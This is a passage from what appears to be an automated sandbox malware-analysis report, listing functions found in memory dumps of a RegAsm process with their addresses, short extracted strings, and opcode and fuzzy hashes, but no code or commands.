                                                        • Opcode Fuzzy Hash: 454859d2bd63f1a1b0745f4075df2fe4a167d416df7e262759217dde1b19c3ee
                                                        • Instruction Fuzzy Hash: 0F715A75E8061A8FDF28CF99D5906EDBBB6BF48748F14D12EE806AB240D7319941CF50
                                                        Function 00402BB0 Relevance: 1.4, Strings: 1, Instructions: 198COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: gfff
                                                        • API String ID: 0-1553575800
                                                        • Opcode ID: ecf25bbdcb132e6b8c7ea69949a1fe0a688041c898b44f6fc708c2f18267258a
                                                        • Instruction ID: 1bb55d3ff02d0482993f200c53eb1e896baba391a6d6d7ab0f612cb440442926
                                                        • Opcode Fuzzy Hash: ecf25bbdcb132e6b8c7ea69949a1fe0a688041c898b44f6fc708c2f18267258a
                                                        • Instruction Fuzzy Hash: CC515431A0451A07CB1C8D2DCD993EAB652ABE1304F1C82BEDD8AEF3D5E57CAD018794
                                                        Function 02E0973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @
                                                        • API String ID: 0-2766056989
                                                        • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                        • Instruction ID: 4c1a09528e7b54c4e02026591e488f8a5cf779a2e5de67f65cfaa85116499716
                                                        • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                        • Instruction Fuzzy Hash: ED61B071D80218AFDF21DFA5C884BEEBBB5FF80B58F149169E910B7291D7309941CB60
                                                        Function 02E8F7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @
                                                        • API String ID: 0-2766056989
                                                        • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                        • Instruction ID: d1f06ec2b30262f1b41b450cdfb549ee4018610556331cfdd02768bf40340ce8
                                                        • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                        • Instruction Fuzzy Hash: 8551FF72584701AFD721EF54C840F6BB7E8FF84758F409929BA8897690DB70ED04CBA2
                                                        Function 02E1E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: EXT-
                                                        • API String ID: 0-1948896318
                                                        • Opcode ID: b7f8cc9bed89953297eb4beeded93b09fae619c94baefe2bea9f03c502493703
                                                        • Instruction ID: 263c7f7b20ebfc6fd15d3f01b1ddd033cc63c30300c0452bda89d7919b3cd7e6
                                                        • Opcode Fuzzy Hash: b7f8cc9bed89953297eb4beeded93b09fae619c94baefe2bea9f03c502493703
                                                        • Instruction Fuzzy Hash: 7C41B2725883019BE710DB74C840BABB7D9AF88718F48993DFA85D7180EB74D904CB92
                                                        Function 02EBB256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PreferredUILanguages
                                                        • API String ID: 0-1884656846
                                                        • Opcode ID: 33c7c75efec8d90fd80663933b38689caed6a6609ddd94550c2ac9a6122a4643
                                                        • Instruction ID: daca586c0feb995e834fbb0d5bde565e4ba5f328c0e4bb91fb82a165a7ce35a7
                                                        • Opcode Fuzzy Hash: 33c7c75efec8d90fd80663933b38689caed6a6609ddd94550c2ac9a6122a4643
                                                        • Instruction Fuzzy Hash: F641B732D40219ABDB16DA94C840BEFB7B9EF4475CF05916AED42AB250D7B0DD40CBA0
                                                        Function 02E7C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: BinaryHash
                                                        • API String ID: 0-2202222882
                                                        • Opcode ID: 4df72556c49fd6a2992e04c0ed9078057b1323288078223134e8c5bdfac8ebef
                                                        • Instruction ID: bb8e30a148e8aa1e6c54b1eacbd1e48385787b9721c05dc39d352f3b74da51ff
                                                        • Opcode Fuzzy Hash: 4df72556c49fd6a2992e04c0ed9078057b1323288078223134e8c5bdfac8ebef
                                                        • Instruction Fuzzy Hash: 7F4177B1D4052CABDB21DA50DC80FDE777DAB45718F1095E6FB08A7140DB30AE898F94
                                                        Function 02E897A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: verifier.dll
                                                        • API String ID: 0-3265496382
                                                        • Opcode ID: 8be22f2f9fd1dcea84e3d108b48848634d942daa05f21111052fa963ce23f780
                                                        • Instruction ID: d303f09a799b8c5576d2200186b3539fcd32ef1c15efba05375e953559934c35
                                                        • Opcode Fuzzy Hash: 8be22f2f9fd1dcea84e3d108b48848634d942daa05f21111052fa963ce23f780
                                                        • Instruction Fuzzy Hash: 53318371E803029FDB25AF699850B3677E5EB98318F94D439E64DDB382E7718C80C790
                                                        Function 02EA705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: kLsE
                                                        • API String ID: 0-3058123920
                                                        • Opcode ID: ea5ff8f890dfd0ac73ce183d3fc6c75e67c294710d1234c22b0a5f87fdb9f0d1
                                                        • Instruction ID: bd3840e2ed06e3d1eb446bbd7c8596aa82182b49efc0ff95b8ee543e0d446fb0
                                                        • Opcode Fuzzy Hash: ea5ff8f890dfd0ac73ce183d3fc6c75e67c294710d1234c22b0a5f87fdb9f0d1
                                                        • Instruction Fuzzy Hash: 2D41AB329C034047E760EB66E89576A7BD8EB8072CF54A928FF604E1C1C77524D2CBA0
                                                        Function 02E336EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Flst
                                                        • API String ID: 0-2374792617
                                                        • Opcode ID: f64c4e128f0a3a59a8e112a7dbf5703425f5db14cf3747d9759788568e212848
                                                        • Instruction ID: 7e8e233734453d6e19a0c195e8c2af024daa0ebe9d6ac80291145ee992ba968d
                                                        • Opcode Fuzzy Hash: f64c4e128f0a3a59a8e112a7dbf5703425f5db14cf3747d9759788568e212848
                                                        • Instruction Fuzzy Hash: C141CAB06453019FC315CF29C088A66FBE4EB89719F14D1AEE949CF281DB31D942CBD1
                                                        Function 02E05096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Actx
                                                        • API String ID: 0-89312691
                                                        • Opcode ID: ab5cb799a6bb68dda7bf6e47051589d0909005e93ef2bee997aec0bd0b66aefa
                                                        • Instruction ID: c92d97b9aa59184285d8dd3fecc3f22daaf6054879e1308d72ada342600c63f6
                                                        • Opcode Fuzzy Hash: ab5cb799a6bb68dda7bf6e47051589d0909005e93ef2bee997aec0bd0b66aefa
                                                        • Instruction Fuzzy Hash: 2A1172303C46028BDB24491D88D0B7A7295BB9235CFB4E52AD492CB3D4D771DCC2CB90
                                                        Function 00404484 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: -\P
                                                        • API String ID: 0-1722783593
                                                        • Opcode ID: eb88dc91de4af2a636c8ec189a0070e9dd45a09601a8d00c703505193fa1516a
                                                        • Instruction ID: 36dc246ab5cb60661f41eda658c04183d52f1f6ef18c98482c799961a0dce1ef
                                                        • Opcode Fuzzy Hash: eb88dc91de4af2a636c8ec189a0070e9dd45a09601a8d00c703505193fa1516a
                                                        • Instruction Fuzzy Hash: 0D2134B0D012199ECB84CFB996466EEBFF0FF58200F64426AD519F6250E3358A44CFA9
                                                        Function 02E3E8F0 Relevance: 1.0, Instructions: 985COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f9890ae7c064cac0a5780f295519c660b725d37862192d4941b0123fa5fe2ec2
                                                        • Instruction ID: 8e171499bef2f1695fc2bb15c4c020f0f3f5a226ee4d7415b54d47c6aebbc930
                                                        • Opcode Fuzzy Hash: f9890ae7c064cac0a5780f295519c660b725d37862192d4941b0123fa5fe2ec2
                                                        • Instruction Fuzzy Hash: 91823072F102188BCB58CFADD8916DDB7F2EF88314B19812DE41AEB345DA34AC56CB45
                                                        Function 02E4516C Relevance: .8, Instructions: 785COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d710c5a81e22fde14e74b11cbba46b9bc55c7362448edd74d54d7f276d6f2a2d
                                                        • Instruction ID: 0988cfda6a592a4439caebc0ec38d7380cb60e8bee8a941f5b19a55a151ff12c
                                                        • Opcode Fuzzy Hash: d710c5a81e22fde14e74b11cbba46b9bc55c7362448edd74d54d7f276d6f2a2d
                                                        • Instruction Fuzzy Hash: B062A172C8464AEFCF14CF08E4905EEBB72BE65318BC5E65DC89A27604D731BA54CB90
                                                        Function 02E5739A Relevance: .7, Instructions: 705COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a9e81c9d3f9fdb01a2e21274febd2bf3f96239da3f1b1ff0ef026b04e348c0a3
                                                        • Instruction ID: 0288024b23186ed06336615dd233a0518f8c13f7507b78c8458ec34c16019c70
                                                        • Opcode Fuzzy Hash: a9e81c9d3f9fdb01a2e21274febd2bf3f96239da3f1b1ff0ef026b04e348c0a3
                                                        • Instruction Fuzzy Hash: 8E429F71A506268FCB18CF59C8906BEF7B2FF88318B14D569E956AB340D734E852CB90
                                                        Function 02E55AA0 Relevance: .7, Instructions: 652COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                        • Instruction ID: eb35deafee5a148e98e8bfd7d17763f272ec6adeb0cd97324e3dbf259a8d3c2a
                                                        • Opcode Fuzzy Hash: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                        • Instruction Fuzzy Hash: 89128273B716180BC344CD7DCC852C27293ABD452875FCA3CAD68CB706F66AED1A6684
                                                        Function 02E2B2C0 Relevance: .6, Instructions: 629COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 275206f21bc15e9934eeee1f85635df0a2b1983ce2782ef2617e1e4c827cce17
                                                        • Instruction ID: 6d7a3dee94dc0c3f620dd1b7717cffb9593ff5eaa29838b4b5431392277b5a93
                                                        • Opcode Fuzzy Hash: 275206f21bc15e9934eeee1f85635df0a2b1983ce2782ef2617e1e4c827cce17
                                                        • Instruction Fuzzy Hash: 8932B075E80229DBCB14DF58D884BEEBBB5FF54718F18902DE806AB380E7319945CB90
                                                        Function 02E12840 Relevance: .6, Instructions: 605COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ffd2430b3270fad228999f8b7bccadb2972f5b08839fb09a17a61882ff5b3f39
                                                        • Instruction ID: c00362b12f078303b703b9d4cbd6a58d95bb52113616acef6469ee270899bc2d
                                                        • Opcode Fuzzy Hash: ffd2430b3270fad228999f8b7bccadb2972f5b08839fb09a17a61882ff5b3f39
                                                        • Instruction Fuzzy Hash: 5732F170A907548BDB24CF69C8487BEBBFABF84348F14D52DE9469B284D739A841CF50
                                                        Function 02EAA118 Relevance: .6, Instructions: 591COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 947c6817de9380d3d6a046e483be0e5ab2071e4b87ba80edf750473e52850cbe
                                                        • Instruction ID: 61f7511906e9b4588c41061a1f99a4942c5867cd3d33ef4813fa50e9a8bcfda1
                                                        • Opcode Fuzzy Hash: 947c6817de9380d3d6a046e483be0e5ab2071e4b87ba80edf750473e52850cbe
                                                        • Instruction Fuzzy Hash: D022AD706847518BDB25CF29C0A43B6B7F1AF44308F18E4AAE8968F385E735F456CB60
                                                        Function 02EC16CC Relevance: .6, Instructions: 571COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: af2df17cc4e91ded1c76a24322a1b8d663b4c667c2533c3363d1617dbf9fb978
                                                        • Instruction ID: 465537fe07870e8ce3075953a322fdc67ac078e1163ed0cd67730b964840d85c
                                                        • Opcode Fuzzy Hash: af2df17cc4e91ded1c76a24322a1b8d663b4c667c2533c3363d1617dbf9fb978
                                                        • Instruction Fuzzy Hash: 1922A335A40216CFCB19CF98C590ABAB7B2BF89318B24D56DD9599F342DB30D942CB90
                                                        Function 02E2FB80 Relevance: .6, Instructions: 559COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1e41dd9433cad3decff7e64605767b9611442c8cc86aa003641457498bfc38b8
                                                        • Instruction ID: 05ffbe640eef2ead7972586f8cf573fd3e493a04c1c06edb7947c22e3c4bc220
                                                        • Opcode Fuzzy Hash: 1e41dd9433cad3decff7e64605767b9611442c8cc86aa003641457498bfc38b8
                                                        • Instruction Fuzzy Hash: 6522D471E802199FDB10DFA4C890BAEB7B5FF84304F14D5A9E9159B281E730EA85CF90
                                                        Function 02E28DBF Relevance: .6, Instructions: 554COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: af91ccf2c3d102d2c28832dffa569739b4685d62a9bf72f4fdd90a6f879ffc96
                                                        • Instruction ID: 45d63b7c83734a543a1acb3f1c813bf003c064aa1badc41b0e875ae9c00ff6e3
                                                        • Opcode Fuzzy Hash: af91ccf2c3d102d2c28832dffa569739b4685d62a9bf72f4fdd90a6f879ffc96
                                                        • Instruction Fuzzy Hash: E5224E70E8016ADBDB18CF55C880ABEFBF6BF48348B55D05AE846AB241E734DD41CB64
                                                        Function 02EC2446 Relevance: .5, Instructions: 485COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5d4b7b19caade9d75ef37a97712c89e2b7f6813d5f066c34f224a5896d9e8759
                                                        • Instruction ID: 988d70e12e24558450b089f41c39eb12ba52b50e398d074d130cb6a0ca0c85e2
                                                        • Opcode Fuzzy Hash: 5d4b7b19caade9d75ef37a97712c89e2b7f6813d5f066c34f224a5896d9e8759
                                                        • Instruction Fuzzy Hash: 8C02E2356446518BDB18CFA9C6903B6B7F1AF84308B24D19EEED6CB281D734D843DB61
                                                        Function 02EDB16B Relevance: .4, Instructions: 450COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bd03876364f44f76743d548bd657c4cd71cd61a270a94674193655d8b3464bab
                                                        • Instruction ID: 4d2143b4d9d9fb8660abb6d88708b848dab8f2178afbd107fe52e5914f0ce313
                                                        • Opcode Fuzzy Hash: bd03876364f44f76743d548bd657c4cd71cd61a270a94674193655d8b3464bab
                                                        • Instruction Fuzzy Hash: 3FF1F673E406118BCF18CF69C99067EBBF6AF9821871A916DD456DB380F734EA42CB50
                                                        Function 0040FFE3 Relevance: .4, Instructions: 435COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                        • Instruction ID: c78632ac47994f2897b0d26796d53910ba590a58f0bfeb40a09627e4ac2fb853
                                                        • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                        • Instruction Fuzzy Hash: 2F026E73E547164FE720CE4ACDC4765B3A3EFC8301F5B81B8CA142B613CA79BA525A90
                                                        Function 02EDA9A6 Relevance: .4, Instructions: 425COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9a48acf49aa8fc42dd7bd24430f92b1f28f4f5136f2ca61b3e08581d047e77dc
                                                        • Instruction ID: 70a2939a60e1fa9a3c24b82dde9a4f4f16fabcfc071c0df302ecb7332f581916
                                                        • Opcode Fuzzy Hash: 9a48acf49aa8fc42dd7bd24430f92b1f28f4f5136f2ca61b3e08581d047e77dc
                                                        • Instruction Fuzzy Hash: 32F1D373E405269BCB18CF68C5A05BDFBF2AF45214B199279D856EB380D734EE42CB90
                                                        Function 02E2FDC0 Relevance: .4, Instructions: 390COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dc4da33476b05533a8d4889d949fa4343f25dead23241959f26d5b86aace5750
                                                        • Instruction ID: 2761a1a4b744600820260bbc34da9b17772a6868a2ed379e0e5f062300664334
                                                        • Opcode Fuzzy Hash: dc4da33476b05533a8d4889d949fa4343f25dead23241959f26d5b86aace5750
                                                        • Instruction Fuzzy Hash: C7F19070E40219DFDB14DFA4C890BAEB7B5FF48318F14D5A9E905AB281E731DA85CB90
                                                        Function 02DF8397 Relevance: .4, Instructions: 380COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 22d81bedb2b0ee636051c15d3a2ba6761eb2fae41bc778aee74ec2a91778face
                                                        • Instruction ID: f48ad69fdf21f5a407b224c2578c2109663fa5b3426346b56d38fdbc44991fc6
                                                        • Opcode Fuzzy Hash: 22d81bedb2b0ee636051c15d3a2ba6761eb2fae41bc778aee74ec2a91778face
                                                        • Instruction Fuzzy Hash: C1D1CE71A502169BCB54DF64C880BBAB3E6EF44308F06862DEA56DB380EB30DD41DB65
                                                        Function 02E2C6E0 Relevance: .4, Instructions: 367COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1b743a50227034f4074ff82c478132713ed35c88174b4a4f45d42f14c0329064
                                                        • Instruction ID: 074584cb43cf9f07d2deb32dfed131e4ab89cfc2ced1c0190cbdc09cac90f230
                                                        • Opcode Fuzzy Hash: 1b743a50227034f4074ff82c478132713ed35c88174b4a4f45d42f14c0329064
                                                        • Instruction Fuzzy Hash: 10D17C75E842298BDF28CA98C5447FDB7B1BB44348F26F02BD807A7280D7749989CB85
                                                        Function 02E138E0 Relevance: .3, Instructions: 349COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e78251ebf8bf71c6288a5582e554dafefc6261a3821160655868374f486d1e9e
                                                        • Instruction ID: 52993ee9a08a230f735399ffa664036c78e403ba0656056c44377dac65d3c1b3
                                                        • Opcode Fuzzy Hash: e78251ebf8bf71c6288a5582e554dafefc6261a3821160655868374f486d1e9e
                                                        • Instruction Fuzzy Hash: 85E1BF75A40205CFDB18CF58C890AAAB7F5FF48314F2591A9E916EB391D734EE81CB90
                                                        Function 02E1CFE0 Relevance: .3, Instructions: 345COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bee45a3871442205c5277c909369cb1ceffa8ac91c2a299124dfbd836a8210c1
                                                        • Instruction ID: 4844903bae88d38f11030e3f852f6335f05b1150593bc21eacda980d3ee08e50
                                                        • Opcode Fuzzy Hash: bee45a3871442205c5277c909369cb1ceffa8ac91c2a299124dfbd836a8210c1
                                                        • Instruction Fuzzy Hash: 7CD1B431B803298FEB65DB15CC90BAAB7B6BB49308F44D0F9D909A7241DB34AD85CF51
                                                        Function 02E0D7E0 Relevance: .3, Instructions: 342COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c8634519529c3f0e46ccfaedd84b98303ff1f846fc39872d3395eb57f8a597fc
                                                        • Instruction ID: a303f527a3e55126d1a95257f9adf2cf9d6dc2be8a60cbdd94501b70bedcd3ac
                                                        • Opcode Fuzzy Hash: c8634519529c3f0e46ccfaedd84b98303ff1f846fc39872d3395eb57f8a597fc
                                                        • Instruction Fuzzy Hash: EFC1B371E802159BDB24CF98CC84BBEB7B6EF44758F14D269D915AB2C0D770E982CB90
